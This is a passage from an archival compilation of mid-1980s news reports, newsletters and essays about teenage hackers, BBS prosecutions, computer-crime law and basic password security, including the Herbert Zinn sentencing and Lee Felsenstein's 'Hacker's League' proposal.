	   A spokesman for American Telephone & Telegraph Co. said there was 
no indication that any of its satellites had been moved, or that even an
attempt to move them was made.
	   Assistant Prosecutor Frank Graves said investigators still had
``six more computers and 9 million floppy discs'' to look through.
	   ``We had 300 names in one computer and we charged seven,'' Graves 
said. ``We have no idea what's in the other computers and won't know for
a while.''
	   The youths, whose names were withheld because of their ages, are
charged with juvenile delinquency by reason of conspiracy to commit 
theft.
	   South Plainfield police detective George Green said four of the 
defendants operated electronic bulletin boards, which are used for the
exchange of legitimate information by hundreds of people. 
	   The youths also had a special code that provided illegal access to
restricted information, Green said, and only those who used these parts 
of the bulletin boards were arrested. 
	   Rockoff said the investigation began in April when postal officials 
informed the South Plainfield police that someone using a post office 
box under a fictitious name apparently had been using a computer to gain
illegal access to the computer of a Connecticut credit company. 
	   Rockoff turned over the results of the investigation to the Secret
Service since the bulletin boards contained telephone numbers in a
military defense communications system in the Defense Department, The 
New York Times reported Wednedsay.
	   Plainfield patrolman Michael Grennier, a computer expert, said the
youths also were able to break into an American Telephone & Telegraph 
computer after obtaining a manual from a AT&T trash bin.
	   The investigation led to a South Plainfield youth, whose computer 
was seized in June. After Grennier and Green spent about 100 hours
looking through his computer, the other six were arrested Friday _ in 
Hillsdale, Westwood, Warren Township, Martinsville, Dover and Edison. 
	   But Jeffrey Fogel of the ACLU office in Newark said the Dover 
youth, whom he declined to identify, was unfairly singled out.
	   ``He has an electronic bulletin board and arresting him and seizing 
his computer amounts to seizing a printing press,'' Fogel said. ``It
would be like if someone put a stolen credit card number in a newspaper 
classified. Would you close down the newspaper?'' 

NEW HACKER CASE RAISES FEARS: 
  Computer hackers "have the capability of doing a great deal of
damage," says Rep. William J. Hughes, D-N.J., commenting on the 
case of 7 N.J. youths charged with breaking into Pentagon computers 
and stealing satellite codes. Hughes is sponsoring federal computer 
crime bills to help fight the problem. (USA TODAY, July 18, P.1A) 

KAYPRO WINS PC COMPARISON:
  The Kaypro IIx personal computer is the best machine for home use 
costing less than $1,500, says Consumer Reports. It beat the Apple
IIe Professional and the discontinued TRS-80 Model 4P. Kaypro was 
picked for its disk capacity (800 kilobytes) and the large amount 
of software that comes with it. (Consumer Reports, August, P.467) 

COMPUTER CALLS ABSENT STUDENTS: 
  Kettering, Ohio, school officials are using a Texas Instruments 
computer to call the homes of absent students as part of the
state's Missing Children Act. System makes 75 calls an hour.
Computer voice tells parents their child is absent and asks for a 
response, which is recorded like an answering machine. (USA TODAY,
P.5B) 

From
PR NEWSWIRE
Thursday  July 18, 1985

DOWTY ELECTRONICS SAFEGUARDS U.K. DEFENSE SECRETS 
 
            UK "SHOULD BE SAFE" FROM DATABASE BURGLARS
    NEWBURY, England, July 18 /PRNewswire/ -- British Ministry of 
Defence secrets need never be at risk from home computer "hackers" -- 
microchip technology's equivalent of cat burglars -- an electronics 
expert claimed today. 
    Following disclosures of teenage hackers breaking into military 
information banks at the Pentagon -- the U.S Defense Department 
headquarters -- Bruce Brain, general manager and director of Dowty
Electronics' Information Technology Division, said:  "It need never 
happen here." 
    The U.K. faced similar problems to America, said Brain. "But the
introduction of Dowty's 'Horatius' dialback data security system -- 
an anti-hacker box -- means that no-one would be able to break into 
sensitive or confidential databases, even with the knowledge of 
ex-directory phone numbers. 
    "Horatius allows only authorized users to access a computer 
system, and they must also call from a pre-cleared phone number 
within an agreed time-frame," he explained. 
    Horatius -- designed and manufactured in the U.K. -- is selling 
well, says Dowty, which is currently negotiating to introduce the 
system to the U.S.A through its New Jersey-based subsidiary, Dowty
RFL Inc.
         PAPER FINDS 2 HACKER BOARDS:
  2 electronic bulletin boards have been found to contain access
codes for computers at military, research facilities. The boards,
"Fatland" and "Dark Side of the Moon," - both based in Virginia
-held access numbers for the Naval Ship R&D Center, NASA's Ames
Research Center. No arrests reported. (Online Today)

NEW JERSEY HACKER CASE MAY BE A TEST
OF SYSOPS' FREE SPEECH PROTECTION

     The attorney for one of seven New Jersey teenagers charged
with conspiring to use their computers to exchange stolen credit card numbers
and make free long-distance calls says he will argue that his client is
protected by the constitutional guarantee of free speech.
     Jeffrey E. Fogel, executive director of the New Jersey chapter of
the American Civil Liberties Union, told BULLETIN BOARD SYSTEMS that he an
associate will defend a teenager who operated the Private Sector BBS.
     "We are relying on his representation that all he did was run
a bulletin board, that he didn't make a calls or use stolen credit card
numbers," Fogel said. If that is true, he added, "I don't think there is
any liability."
     The defendants, all under 18, were charged July 16 with juvenile
delinquency based on an underlying charge of conspiracy to commit theft.
Police confiscated the computers and software of some of the defendants.
     Middlesex County Prosecutor Alan A. Rockoff told reporters
that the individuals exchanged information that would allow them to access
commercial computers without authorization and that some of them had codes that
could cause communications satellites to ''change position.''
However, spokesmen for AT&T and other carriers said their
systems are secure and denied that any satellites had been moved.
     Rockoff said the investigation began in April when postal
officials informed police that someone using a post office box
under a fictitious name apparently had been using a computer
to gain illegal access to the computer of a Connecticut credit
company.
     Fogel said he believes that the prosecution will have to show that
his client actually used the credit card numbers or telephone access codes
to prove his case. Allowing the information to be posted on his client's
bulletin board, he said, is not a criminal act.
     "There's nothing illegal about those messages being there," he said.
     "Let's say you find an AT&T calling card on the street and you put an
ad (listing the number) in the New York Times. I'm confident that the
New York Times is not liable.
     "Bulletin boards are the same as a free press," Fogel said. "They are
like electronic magazines in which the users can publish what they choose."
     Fogel drew an analogy to two well-known free press cases: the
publication of plans for a hydrogen bomb in Progressive magazine and
publication of the Pentagon Papers by the Times.
     "What really gets me upset in this case is they seized the
'printing press.' I don't think they had the right to seize his
computer, Fogel said.
     The concept of First Amendment protection for bulletin board
operators has yet to be tested in court. Last year Los Angeles
sysop Tom Tcimpidis was charged with telephone fraud when Pacific Bell
investigators found a calling card number posted on his BBS. But the charges
were dropped in February before the case came to trial.
     Rockoff said his case is the first major prosecution under
recent New Jersey law that makes it a crime to obtain data
from a computer without authorization.


COMPUTER LAWS VARY FOR STATES:
  Computer break-ins catches states with varying laws. Example:
Tapping into computer is felony in California, but no N.Y. law
rules "hacker" abuse, except federal statutes on interstate
information theft. UCLA student who tapped N.Y. college system
faces prison for "malicious computer entry" under Calif. law.
(Gannett News Service)

L.A. Times, Tuesday, September 3, 1985  San Diego Section (Editorials)
----------------------------------------------------------------------
``Garbage In, Garbage Out''

     Many people have worried for years about what will happen when government
finds a big computer that can catalogue everything about everybody, every scrap
of information - true or false - would then be available at a push of a button.
That day is not here yet, but experience with the FBI's National Crime Inform-
ation Center, the nation's centralized computer data-base, indicates that such
fears for the future are not groundless.
     A continuing series of FBI audits of the data base has found that it sends
12,000 false or inaccurate reports on individual suspects every day to law-
enforcement agencies around the country.  It's not really the FBI's fault.  The
erroneous information that the computer spews out was put in by state and local
law enforcers in the first place.  There appears to be not much quality control
in crime information, and, as one of the oldest lines in computerdom assers,
``Garbage in, garbage out.''
     But the information in that computer is more than accounting data or the 
marketing forecasts of strategic planners.  This is vital personal information
that affects people's lives.  There have been cases, and not just a few of them
in which the wrong person has been arrested and jailed because of bad informa-
tion from a computer.  Police officers are more likely to take the word of the
FBI's computer than of a person who claims it's all a mistake.
     About 62,000 criminal-justice agencies throughout the country seek infor-
mation from the FBI's crime computer nearly 500,000 times a day.  The FBI says
that a 2.4% error ratio isn't so bad when you consider that the system results
in the apprehension of more than 70,000 wanted felons a year.  Tell that to 
people that have erroneous information about them sent to the local cops.
     And the police are not the only ones who get this information.  A growing
number of employers, such as day-care centers and schools, also use the FBI
crime computer to run background checks on prospective employees.  There is a
legitimate social need to do that, but, if the information is wrong, a person's
livelihood, carreer, and reputation may be irrepairably damaged.
     As with many ills, it is easier to describe the problem than to fix it.
But it's clear that the accuracy of the information maintained by the FBI needs
more scrutiny.
     Rep.Charles E. Schumer (D-N.Y.) has proposed giving the states more money
to beef up their record-keeping.  That would help.  But no ammount of
effort and attention can ever eliminate all errors from a human system.  People
have always made mistakes, and always will make mistakes.  The trouble is that
the computer makes it possible to give those mistakes nationwide distribution.
     Still, things can be improved, and it is vital to the FBI and to all law
enforcement that they be improved.  The future of the National Information 
Center depends on reducing the error rate so that both the police and the 
public are confident that information obtained from the computer is correct.
-------------------------------------------------------------------------------
Dutifully typed by Henry Spire, C.I.A.
-------------------------------------------------------------------------------

              LAWYERS' MICRO USERS GROUP NEWSLETTER
                         September, 1985

COMPUTER SECURITY -- DIGITAL PATHWAY'S SECURENET FAMILY OF PRODUCTS

Computer security is on everyone's mind these days. Recently, hackers had
at it on several BBS's in the Chicago area.  And we read almost daily about
Hacker attacks on governmental and or financial institution computers.
Digital Pathways Inc. at 1060 East Meadow Circle, Palo Alto, California
94303 (415) 493-5544, through it's Defender II family of products provides a
unified approach to preventing unauthorized dial-in access to computers. One
of these units is installed between your computer and the telephone line.
There is a dial-in/call back feature, so when someone dials up your
computer, this device calls the proper telephone number of the caller back.
A synthesized voice answers each call-in and requests the caller's ID.  The
ID is entered via Touch Tone.  If the ID is valid, the system looks up the
parameters of the user and arranges for a call-back.  Prices start at $3,600
at quantity one.  Although not inexpensive for a small BBS operation,
obviously a law firm using a computer for client contact and/or for lawyers
to call in from remote locations should seriously consider this kind of
investment.

THE HACKERS - FROM CURIOUS TO CRIMINAL

The original computer hackers who broke into databases and networks were
careful to leave no traces of their entry and not to disturb the data.  This
soon changed as less sophisticated and more malicious computer hackers came
on the scene.

The malicious Hacker horror stories have filled newspapers and magazines for
over a year.  Often the less responsible computer "Hackers" prowl the
electronic alleyways at night, when many firms leave their computer systems
on and attached to phone lines to transmit large blocks of data when the
phone rates are cheaper.  With nobody in the office, penetration of data
bases which lack proper security is often only a matter of time and
patience.

Some Hackers have been amazed to discover that firms which have installed
password protection schemes to prevent unauthorized access have failed to
change the original password which came with the system - "PASSWORD."  What
can happen if your system is easy to penetrate?  While not all Hackers are
data thiefs or vandals, some few malicious modem miscreants have been known
to penetrate a computer system and not only steal but also scramble the
data.

Imagine switching on your terminal one morning only to discover 300 pages
of text had been transformed into a series of seemingly random numbers?

As is often the case, the best sense of Hacking and Hacker morality comes
from the literature of that subculture itself.  Here are excerpts from three
articles in a recent issue (Number 91!) of the original newsletter for
Hackers and "Phone Phreaks" called, appropriately "TAP: The Hobbyist's
Newsletter for the Communications Revolution."

                            Dunn and Bradstreet:
                    Do they know something that we don't

                          by BIOC Agent 003 & Tuc

In issue #90, we explained how to use the Dunn and Bradstreet system (which
is now known as Dunsprint).  A week after the issue was mailed a phellow
phreak found out that a copy of the issue had fallen into the hands of our
"friends" at D & B.  To say the least, they weren't exactly thrilled about
it.  In fact, they did not even believe that they had a security problem!
Well, that just goes to prove that if you are good (or they are incredibly
stupid, whichever the case may be) no will know that you are there!

In a big effort to defeat hackers, they called in an outside service to
spruce up their "security."  Fortunately for us, we were able to find out
about the new system!  This was really not a problem,, though.  First,
they had the new dial-ups posted when you logged on. Secondly, they have a
nice little place on Telenet!  (Where we do most of our "work"--[deleted])

                  Sorry D & B ....Good news travels fast!

                A lesson in Phreaking and Hacking Morality:
                               by Big Brother

I find it truly discouraging when people, intelligent people seeking
intellectual challenges, must revert to becomming common criminals.  The
fine arts of hacking and boxing have all but died out. Though you
newcomers, you who have appeqred on the scene in the last year or two, may
not realize it, we had it much better.  People didn't recognize our
potential for destruction and damage because we never flaunted it, nor did
we exercise it.

For hacking, it was the intellectual challenge which drove us to do it.  The
thrill of bypassing breaking through someone's computer security was
tremendous.  It wasn't a case of getting a password from a friend, logging
on, and destroying and entire database.  We broke in for the challenge of
getting in and snooping around WITHOUT detection.  We loved the potential
for destruction that we gave ourselves but never used.

Today, after so much publicity, the fun has turned to true criminality.
Publicity we have received is abhorring.  From WarGames to the headlined
October Raids, to the 414's, the Inner Circle, Fargo 4A, and the recent NASA
breakins--not to mention all the local incidents that never made the big
newspapers, like breakins at school computers or newspaper computers.  TRW
credit information services claims hackers used the three stolen accounts to
aid them in abusing stolen credit cards.  The thrill of entering and looking
around has shifted to criminal practicality--how can I make my bank account
fatter--how may I use this stolen credit card to its fullest--how could I
take revenge upon my enemies.




                   by Cheshire Catalyst, Managing Editor

The corporate types should realize that if a teenaged hacker is getting into
their system, an industrial spy could have logged in regularly for the past
3 years.  While I may not particularly care for a TRW or [Citibank] having
"Confidential information" about me, I especially don't like the idea of
unauthorized people spreading the data around.

There are no quick answers, because computer security is not just a matter
of hardware, software, locks, and walls.  Security is a people problem.
When you put in locks, you watch the people you give the keys to (notice an
analogy to encryption here).  If these people FEEL they're being watched,
they may get "disgruntled".  Needless to say, a disgruntled employee is
worse than almost anything else you could be combating.

Any of our corporate subscribers who would like to wake up their management
to the vulnerabilities of computer systems should be made aware that I am
available for lectures and consulting.  Just drop me a line at the TAP
maildrop, or via MCI Mail (username: TAP), or telex number 650-119-5732.



SUGGESTED PRACTICES TO FOLLOW FOR COMPUTER SECURITY

In light of the importance of a password, the following practices should be
followed by every user of a multiuser computer system.

1. DON'T USE A LOGICAL PASSWORD THAT IS EASY TO FIGURE OUT. Someone intent
on impersonating you will try the easy password guesses first. For example,
I would never use a password consisting of any part of my name or a close
family member's name, my address, my auto license, etc. This information is
too easy to obtain and if an imposter has targeted you as his "doorway" to
the system, he or she can probably get this information. Use a password that
is either a combination of letters and numbers that are only meaningful to
you (for example, your phone number converted to the first letter assigned
to each number on the telephone. Please do not use this method now that it
has been published).

2. CHANGE YOUR PASSWORD OFTEN. If your password remains the same for a long
period of time, the odds that a persistent imposter will hit hit upon it are
greatly decreased. Again, don't get lazy and change your password to one
that violates the first consideration.

3. NEVER GIVE YOUR PASSWORD TO ANOTHER USER OR ENTER IT INTO A SYSTEM IF YOU
ARE UNCERTAIN AS TO THE REASON FOR THE REQUEST.  Otherwise, you may have
given someone else the irrevocable authority to act on your behalf.
Furthermore, because of the nature of computer systems, you cannot prove
that your "agent" was not you. You are initially responsible for everything
that that person does while acting as you. There are several methods used by
imposters or hackers to acquire a valid user's password directly from the
user.  One method is to use a system's communication's mode to send a
message to another user. This method causes some form of message to appear
on the user's screen indicating that something technically meaningless has
occurred and the user should reenter the password. The hacker then watches
what the user types. Another method involves setting up a program which
follows the same technique as above, but the program then stores the
password in a file and the hacker will check for a password later. A
recently used method is to set up a system to collect passwords. This
recently happened in the Chicago area when a bulletin board was set up by
hackers. It gave the appearance of legitimacy, but was later used by the
hackers to access other system because their users had the same password on
several systems. Which leads to the last rule of password usage.

4. NEVER USE THE SAME PASSWORD ON DIFFERENT COMPUTERS. Using the key analogy
above, if all of the locks on your personal possessions have the same key,
you wouldn't entrust that key to anyone. Why use the same password on
several systems? If you do, you run the risk that someone will get your
password and then use that information to access all of the systems you
access. You will soon be unwelcome on several systems (if not a suspect in a
computer crime case).

VIRGINIA LAW HELPS SYSOP GET REVENGE
 
        A Virginia sysop used a new state computer crime law to help prosecute
a teenage hacker who invaded and vandalized his bulletin board. 
        Allen Knapp runs Washington Networks from his home in Vienna, VA, and 
charges $10 for a system password. Last January, Knapp's board got a call from
a 14-year-old Montgomery County, MD, youth who used the handle Phineas Phreak.
        According to Knapp, Phineas discovered Knapp's own password and 
obtained access to the system files and operating program. The caller erased
part of the board's stored files and transferred others to his own computer.
The youth then called Knapp's answering machine and made several demands for
the return of the files.
        However the answering machine tape allowed the Chesapeake & Potomac 
Telephone Co. to trace the call.
        The boy was charged with a misdemeanor under a section of Vigninia's
computer crime law that is designed to discourage erasing or altering computer
data. He was allowed to plead "not innocent" and was sentenced last month 
to one year probation and ordered to pay Knapp $300 for the damages.
        Knapp estimated that the files the boy erased or stole represented
about 180 hours of work.



MENSA BBS SEEKS SMART CALLERS 
 
        Most sysops check out applicants by verifying their names and 
telephone numbers. But on the MENSA BBS in Palm Beach, FL, callers face a 
much tougher screening. 
        All registered users must pass members of Mensa, Intertel or the
Triple Nine Society to receive full system access.
        Mensa is an international society in which the sole requirement for 
membership is a score at or above the 98th percentile on any of a number of 
standard IQ tests. Qualification for membership may be determined by tests
administered by Mensa or by submission of properly certified prior evidence 
to American Mensa,Ltd., 1701 West 3rd Street, Brooklyn, NY 11223. 
        INTERTEL, Inc., PO BOX 15580, Lakewood, Co., 80215, is a similar
organization that requires members to score in the 99 percentile or above on
IQ tests. The Triple Nine Society, 463 Beacon St., Boston, MA, 02115, sets
its standards even higher: the 99.9 percentile. 
        "Please do not harass us if you do not qualify for access," say 
Molly and "Pops," the boards sysops.
        The system does invite amateur radio operators to also call in (use 
your call sign to log in) and anyone who sends $100 to Connelly Corporation,
Box 1164, Palm Beach FL 33480 also can join.
        Members are invited to swap software and generally get to know each 
other through the public message section. 
        The board also serves as a convenient advertising medium for Pops'
classic cars. Among the bargains listed are a 1959 Corvette Roadster for
$19,500; a 1962 Corvette Coupe, for $14,500 or a 1963 Corvette convertible. 
        The BBS, a modified RBBS-PC, is open 24 hours at 300, 1200 or 2400
baUd. The number is 305-842-1861. You also can catch Molly on The Source, 
ST7783. 
The Hacker's League
Lee Felsenstein
18 March 1992

Theory

     The Hacker's League is modeled loosely after the American 
Radio Relay League (A.R.R.L.), an organization of technological 
adventurers of the Edwardian period.  In its heyday, the radio 
amateurs moved from being nuisances to being important 
contributors to the development of radio technology.  In a field 
which demanded governmental regulation for orderly operation, the 
A.R.R.L. represented the interests of amateurs in the councils of 
government and organized ongoing educational activities through 
which newcomers to the field could learn not only the technology 
involved, but also the human interactions which connect the 
technology to the outside world.

     The most recent triumph of radio amateurs has been the 
development of packet radio, which has recently been adopted by 
Motorola as the basis for its "wireless local loop" for wireless 
telephone operation.  Thanks to the amateurs, it was developed 
and tried out in an open environment outside of commercial 
pressures which tend toward secrecy and exclusion. 

     In the area of computers and telecommunication, there are 
several parallels between today's hackers and the radio amateurs 
of 1915.  Hackers are seen by the respectable technological 
players as nuisances capable of doing great damage and generally 
without redeeming qualitites.  They were indistinguishable from 
rogue broadcasters who trampled on other signals in their urge to 
cover the longest distance.  In the corridors of power there was 
a movement toward outlawing them.  Nontechnical people did not 
know quite what to think about this problem and its suggested 
solution.

     The A.R.R.L. was more than a lobbying organization, though.  
It provided a means for the mutual education essential to the 
growth of any technology, a route of entry open to all comers, 
and a social scene to accompany the technological forum.  Through 
the A.R.R.L. green kids could encounter grizzled oldtimers who 
would be unapproachable in their positions the industry.  At 
field days and other events the cameraderie of being explorers 
overcame the barriers of class and position as well as those 
engendered by commercial competition.  Networking was possible in 
the amateur environment which forwarded the operation in the 
commercial and professional environments.

     The concept of the Hacker's League is similar but different 
as befits the different nature of the technology.  The aim is to 
provide a situation in which otherwise unqualified entrants to 
the field can engage in informal learning situations, test their 
skills as a means of exercising their craft, gain hands-on 
experience with systems which would be unobtainable otherwise, 
and participate on both sides of mentoring and tutorial 
relationships. 

     The Hacker's League would provide an outlet for the creative 
energies which are otherwise expended making life worse for 
perceived or imagined enemies through unauthorized entry to 
systems and other illegal or unethical conduct.  Such energies 
would be turned toward projects which advance the state of the 
art, and in a way which undermines the arrogance and exclusivity 
of the corporate managers which hackers find so tempting a 
target.

     To the charge that the Hacker's League would become a front 
for the interests of industry may be raised the defense that by 
exploiting industry's fear of low-level disorder it would provide 
an organizing platform for higher-level attack upon the 
technological underpinnings of the existing structure.  Consider 
the difference between outcomes had hackers in the 1970's been 
content to organize politically for access to mainframes. There 
would have been no personal computer industry, and the power 
relationships would not have undergone the radical changes 
brought about by the triumph of open architecture.  One might 
well have said then that the amateur computer activity was a 
distraction from the true task of tugging at the sleeve of power, 
yet we can all see the effects of that activity.

     The Hacker's League could be seen as a guild serving to 
restrict entry to the membership of the technical elite.  In 
fact, the League would be far more open than the current system 
of university education.  It would provide a means of testing to 
see whether one is suited to the demands of the technology 
without exacting years of commitment to learning prerequisites.  
Within the Hacker's League there would be much more mobility 
among specialties than exists in university curricula, and the 
doors would be open to underage entrants and those who come later 
in life after entrance to a university becomes difficult or 
impossible.

     Still, the human tendencies which lead toward exclusivity 
and the formation of cliques will always be with us, and we must 
bear themin mind as we proceed in conceptualizing and realizing 
the Hacker's League.  The technology in which we work tends to 
eliminate the need for centralization, and one of the important 
outcomes of the Leagues's development would be the demonstration 
of the decentralized mode of organization, as noble an 
exploration as might be contemplated, int he opinion of many.

     After all, the primary challenge is not so much in the 
hardware, or the physical form of the systems of 
intercommunication and interaction around which society develops.  
The important work is in developing the social forms of use of 
this technology which forwards the common good as well as that of 
the individual.  New ways of thinking, as Einstein said, are the 
urgently needed ingredient for the humanization and survivalof 
society.  The Hacker's League would not only provide a 
development bed for social innovations involving the use of 
information technology, but it would empower those innovations 
through the parallel development of the technology and, most 
importantly, of the human network through which the technology is 
made to come alive.

Practice

     The Hacker's League would be  membership organization open 
to nonmembers for certain functions.  It would be organized as a 
nonprofit educational and scientific organization.  Its 
publications would be freely available to all interested readers. 

     The League would hold periodic local events demonstrating 
technical achievements of members or chapters, and offering 
places for individuals outside the League to exhibit or to engage 
in low-level trade, such as swap meets.  A newcomer would most 
probably make first contact at such events, and might decide to 
attend a local chapter meeting. 

     Meetings of local chapters would be high in information 
exchange and low in structure.  Newcomers would be acknowledged 
and provided with a brief orientation so that they would not feel 
put off by displays of technical virtuosity or cliquishness.  If 
the newcomer desired further involvement, there would be a set of 
course tracks available as suggested paths for establishing, 
through achievement, one's level of skill.  These might be 
thought of as Scout Merit Badges, although the name would 
probably not be used.  

     In the early stages of involvement, the newcomer might 
interact with a designated instructor who is also working to 
establish skill in teaching and coaching.  Later, as the newcomer 
gains skill and established competence, he or she would be 
recommended for more individual instruction and consultation from 
more highly skilled mentors.  Such mentoring relationships would 
be an important feature of the League, both as a means and and 
end. 

     The League at the local level would acquire maintain 
obsolescent equipment which would be operated and imporved by the 
members through development projects proposed from the 
membership.  Telecommunication resource would also be solicited 
as donations from carriers, on the none-too-subtle suggestion 
that the availability of such resource in such a context is 
conducive to the developmentof skilled citizens instead of 
antisocial attackers.  Through this resource the League would 
maintain its larger structure, which would be a communication-
based overlay of networks and ad-hocracies.

     Through these structures conflicitng positions could be 
discussed and debated in a functioning participatory democracy.  
Informed plebiscites would be conducted both as a means of 
determining the senseof the League on issues of importsnce and as 
development projects testing the capabilities of information 
technology under various arrangements of use.  The highest 
structure of orgnization would be at the local level, and the 
administrators at wider levels might be given titles, such as 
Janitor, which tend to prevent puffery and self-glorification.  
Sapiential authority would be fostered within the League as 
opposed to positional authority. 

     The newcomer would progress from establishing his or her 
level of skill to a process of exploring the available courses of 
self-development.  It would be possible to propose a specific 
course different from the recommended courses.  The newcomer 
would then engage in projects which require the improvement in 
skill level under the supervision or review of competent skilled 
members. 

     This should be seen as professional development (where the 
word has no connotation of "earning a livelihood") and since it 
is a responsibility of all professionals to teach adn transmit 
their skills, the newcomer would along the way be expected to 
perform as an instructor and later a supervisor and mentor to future 
newcomers.  Thus, progress in self-development would not be 
simply a matter of the "neat hacks" one could accomplish, but 
would require an integration into the society first of hackers, 
then the broader society.  There is no reason why technologists 
must rely on others to represent their work to the public or the 
polity.

     One of the public service functions performed by the 
members of the Hacker's League (and this performance would be 
explicitly carried out by the members and not by the 
"organization") would be consultation on informational security 
and integrity of communications within everyday society.  Members 
of the League would provide a service of analysis of proposals, 
investigations of system misuse and pursuit of abusers which 
would rest on itsown professional foundation rather than serving 
direct commercial ends which might distort the conclusions of 
investigations.

     To use a popular metaphor, members ofthe HAcker's League 
might be compared to doctors on the Electronic Frontier, with 
their own loose medical association to keep quackery at bay and 
serving a public health function.  Or perhaps the analogy might 
be to schoolteachers who also write literature and literary 
criticism, as well as turningout works of art and organizing 
criticism of the same.  Obviously, this metaphoric space needs 
work.

     One can expect to betterone's material condition through 
participating inthe networks of relationships which would be the 
Hacker's League, if one has the skill and aptitude to improve 
one's skills.  If not, it would be no shame to cease 
participation. An important function of the League would be to 
encourage the incompetent to go elsewhere without opprobium.  
They may well turn up as administrators within industry, and it 
is in no ones' interest for there to be hostile relations based 
upon "loser" status. 

     In fact, the Hacker's League would be a way to do away with 
the "winner/loser" dichotomy.  If you try, you win to some 
degree, and younger members less secure in themselves need to 
learn this, at times to a desperate degree.  One can take on more 
thnone can handle, be allowed to fail with support from those 
more experienced, and not incur actual or emotional costs which 
would otherwise drive one away from such experimentation.  The 
Hacker's League wouldn't be working without a measurable degree 
of honestly won failure on the partofits members.

     What types of projects would be undertaken?  Perhaps the 
development of distributed operating systems suitable for 
networks of variegated intelligent devices; elegant user front-
ends and development environments for intuitive system 
configuration; pidgin speech (unnatural language) recognition 
systems; new structures of groupware; posibly neural networks at 
higher levels.  

     But these are my own conjectures, and what would actually 
transpire would almost certainly make these guesses look 
ridiculously quaint and primitive.  Let's give it a chance to 
happen.


Date:     Fri, 17 Feb 89 0:47:45 CST
From:     TELECOM Moderator <telecom@eecs.nwu.edu>
Subject:  Chicago Phreak Gets Prison Term

An 18 year old telephone phreak from the northside/Rogers Park community
in Chicago who electronically broke into U.S. military computers and AT&T
computers, stealing 55 programs was sentenced to nine months in prison on
Tuesday, February 14 in Federal District Court here.

Herbert Zinn, Jr., who lives with his parents on North Artesian Avenue in
Chicago was found guilty of violating the Computer Fraud and Abuse Act of
1986 by Judge Paul E. Plunkett. In addition to a prison term, Zinn must pay
a $10,000 fine, and serve two and a half years of federal probation when
released from prison.

United States Attorney Anton R. Valukas said, "The Zinn case will serve to
demonstrate the direction we are going to go with these cases in the
future. Our intention is to prosecute aggressively. What we undertook is to
address the problem of unauthorized computer intrusion, an all-too-common
problem that is difficult to uncover and difficult to prosecute..."

Zinn, a dropout from Mather High School in Chicago was 16-17 years old at 
the time he committed the intrusions, using his home computer and modem.
Using the handle 'Shadow Hawk', Zinn broke into a Bell Labs computer in
Naperville, IL; an AT&T computer in Burlington, NC; and an AT&T computer at
Robbins Air Force Base, GA. No classified material was obtained, but the
government views as 'highly sensitive' the programs stolen from a computer
used by NATO which is tied into the U.S. missle command. In addition, Zinn
made unlawful access to a computer at an IBM facility in Rye, NY, and into
computers of Illinois Bell Telephone Company and Rochester Telephone Company,
Rochester, NY. 

Assistant United States Attorney William Cook said that Zinn obtained access
to the AT&T/Illinois Bell computers from computer bulletin board systems,
which he described as '...just high-tech street gangs'. During his bench
trial during January, Zinn spoke in his own defense, saying that he took the
programs to educate himself, and not to sell them or share them with other
phreaks. The programs stolen included very complex software relating to
computer design and artificial intelligence. Also stolen was software used
by the BOC's (Bell Operating Companies) for billing and accounting on long
distance telephone calls.

The Shadow Hawk -- that is, Herbert Zinn, Jr. -- operated undetected for at
least a few months in 1986-87, but his undoing came when his urge to brag
about his exploits got the best of him. It seems to be the nature of phreaks
that they have to tell others what they are doing. On a BBS notorious for
its phreak/pirate messages, Shadow Hawk provided passwords, telephone numbers
and technical details of trapdoors he had built into computer systems,
including the machine at Bell Labs in Naperville.

What Shadow Hawk did not realize was that employees of AT&T and Illinois
Bell love to use that BBS also; and read the messages others have written.
Security representatives from IBT and AT&T began reading Shadow Hawk's
comments regularly; but they never were able to positively identify him. 
Shadow Hawk repeatedly made boasts about how he would 'shut down AT&T's
public switched network'. Now AT&T became even more eager to locate him.
When Zinn finally discussed the trapdoor he had built into the Naperville
computer, AT&T decided to build one of their own for him in return; and 
within a few days he had fallen into it. Once he was logged into the system,
it became a simple matter to trace the telephone call; and they found its
origin in the basement of the Zinn family home on North Artesian Street in
Chicago, where Herb, Jr. was busy at work with his modem and computer.

Rather than move immediatly, with possibly not enough evidence for a good,
solid conviction, everyone gave Herb enough rope to hang himself. For over
two months, all calls from his telephone were carefully audited. His illicit
activities on computers throughout the United States were noted, and logs 
were kept. Security representatives from Sprint made available notes from
their investigation of his calls on their network. Finally the 'big day'
arrived, and the Zinn residence was raided by FBI agents, AT&T/IBT security
representatives and Chicago Police detectives used for backup. At the time
of the raid, three computers, various modems and other computer peripheral
devices were confiscated. The raid, in September, 1987, brought a crude
stop to Zinn's phreaking activities. The resulting newspaper stories brought
humiliation and mortification to Zinn's parents; both well-known and
respected residents of the Rogers Park neighborhood. At the time of the
younger Zinn's arrest, his father spoke with authorities, saying, "Such a
good boy! And so intelligent with computers!"

It all came to an end Tuesday morning in Judge Plunkett's courtroom here,
when the judge imposed sentence, placing Zinn in the custody of the Attorney
General or his authorized representative for a period of nine months; to
be followed by two and a half years federal probation and a $10,000 fine.
The judge noted in imposing sentence that, "...perhaps this example will defer
others who would make unauthorized entry into computer systems." Accepting the
government's claims that Zinn was 'simply a burglar; an electronic one...
a member of a high-tech street gang', Plunkett added that he hoped Zinn
would learn a lesson from this brush with the law, and begin channeling his
expert computer ability into legal outlets. The judge also encouraged Zinn
to complete his high school education, and 'become a contributing member of
society instead of what you are now, sir...'

Because Zinn agreed to cooperate with the government at his trial, and at
any time in the future when he is requested to do so, the government made
no recommendation to the court regarding sentencing. Zinn's attorney asked
the court for leniency and a term of probation, but Judge Plunkett felt
some incarceration was appropriate. Zinn could have been incarcerated until
he reaches the age of 21.

His parents left the courtroom Tuesday with a great sadness. When asked to
discuss their son, they said they preferred to make no comment.

Patrick Townson
             HOUNDING TEENAGE HACKERS
             DON'T PLUG THOSE
             LEAKY COMPUTERS


           12/10/84

             THE PETULANT BOYS AND GIRLS WHO PLAY IN THE SANDBOX CALLED
          THE U.S. SENATE GOT INTO ONE OF THEIR TYPICAL TEMPER TANTRUMS
          IN THE LAST HOURS OF THE 98TH CONGRESS THIS FALL. THEY WERE
          SO BUSY SHOUTING AND CALLING EACH OTHER NAMES THAT NOBODY
          SEEMED INTERESTED IN PASSING ANY LEGISLATION.
             IN DESPERATION, THE SENATE LEADERSHIP DECIDED THAT THE
          ONLY WAY TO MAKE THESE MATURE, RESPONSIBLE PUBLIC SERVANTS DO
          THEIR WORK WAS TO HOLD AN ALL-NIGHT SESSION. A LONG LINE OF
          COTS WAS SET UP IN THE CAPITOL CORRIDORS. BETWEEN CATNAPS,
          OUR ELECTED LEADERS VOTED ON BILLS AND AMENDMENTS. IN THESE
